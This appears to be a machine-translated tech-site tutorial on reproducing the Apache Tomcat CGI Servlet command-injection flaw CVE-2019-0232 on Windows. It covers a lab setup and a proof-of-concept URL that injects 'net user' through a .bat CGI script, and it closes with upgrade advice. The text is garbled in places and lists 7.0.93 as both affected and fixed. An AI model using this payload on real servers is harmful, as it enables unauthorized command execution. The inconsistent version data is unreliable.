Shulou(Shulou.com)05/31 Report--

How to perform Apache Tomcat remote code execution vulnerability CVE-2019-0232 reproduction, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can gain something.

Introduction to 0x00

Tomcat server is a free and open source Web application server, which is a lightweight application server. It is widely used in small and medium-sized systems and not many concurrent access users. It is the first choice for developing and debugging JSP programs. For a beginner, it can be thought that when an Apache server is configured on a machine, it can be used to respond to requests for access to HTML (an application under the standard general markup language) pages. Tomcat is actually an extension of the Apache server, but at run time it runs independently, so when you run tomcat, it actually runs as a separate process from Apache.

Overview of 0x01 vulnerabilities

The vulnerability is valid only for Windows platforms and allows an attacker to send a request to CGI Servlet to inject and execute arbitrary operating system commands on a system with Apache Tomcat privileges. The vulnerability is caused by an input validation error in CGI_Servlet when parameters are passed from JRE to the Windows environment.

0x02 scope of influence

Apache Tomcat 9.0.0.M1 to 9.0.17

Apache Tomcat 8.5.0 to 8.5.39

Apache Tomcat 7.0.0 to 7.0.93

0x03 environment building

Environment: Java8+Apache Tomcat 8.5.39

1. Java8 environment is required to install tomcat. Download address for jdk:

Https://www.oracle.com/java/technologies/javase-downloads.html

two。 Double-click the installation after the download is complete, and click next until the installation is complete.

two。 Create a new JAVA_HOME to add the java installation path in the system environment variable, and then add% JAVA_HOME%\ bin;%JAVA_HOME%\ jre\ bin in the Path variable editor

3. Install the tomcat8.5.39 version at:

Https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.39/bin/

4. After the download is completed, unzip the configuration tomcat, open apache-tomcat-8.5.39\ conf\ web.xml in the Tomcat installation directory and uncomment the following two items, otherwise accessing the cgi directory will prompt 404, and the configuration is annotated by default.

Cgi

Org.apache.catalina.servlets.CGIServlet

Debug

0

CgiPathPrefix

WEB-INF/cgi-bin

Executable

five

5. Then modify the add privileged= "true" statement in conf/context.xml

6. Create a cgi-bin folder under apache-tomcat-8.5.39\ webapps\ ROOT\ WEB-INF, and create a bat file inside the folder to write the following code

7. After the configuration is completed, run startup.bat under apache-tomcat-8.5.39-src\ bin to start tomcat.

8. Enter http://your-ip:8080 in the browser and see the following page indicating that the installation is successful

Recurrence of 0x04 vulnerabilities

1. Access http://your-ip/cgi-bin/test.bat?&C%3A%5CWindows%5CSystem32%5Cnet%20user, in the browser and execute the net user command

two。 Modify the following command to calc.exe pop-up calculator

0x05 vulnerability repair

It is recommended that users of the affected version should apply one of the following mitigation. Upgrade to:

Apache Tomcat 9.0.18 or later

Apache Tomcat 8.5.40 or later

Apache Tomcat 7.0.93 or later

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.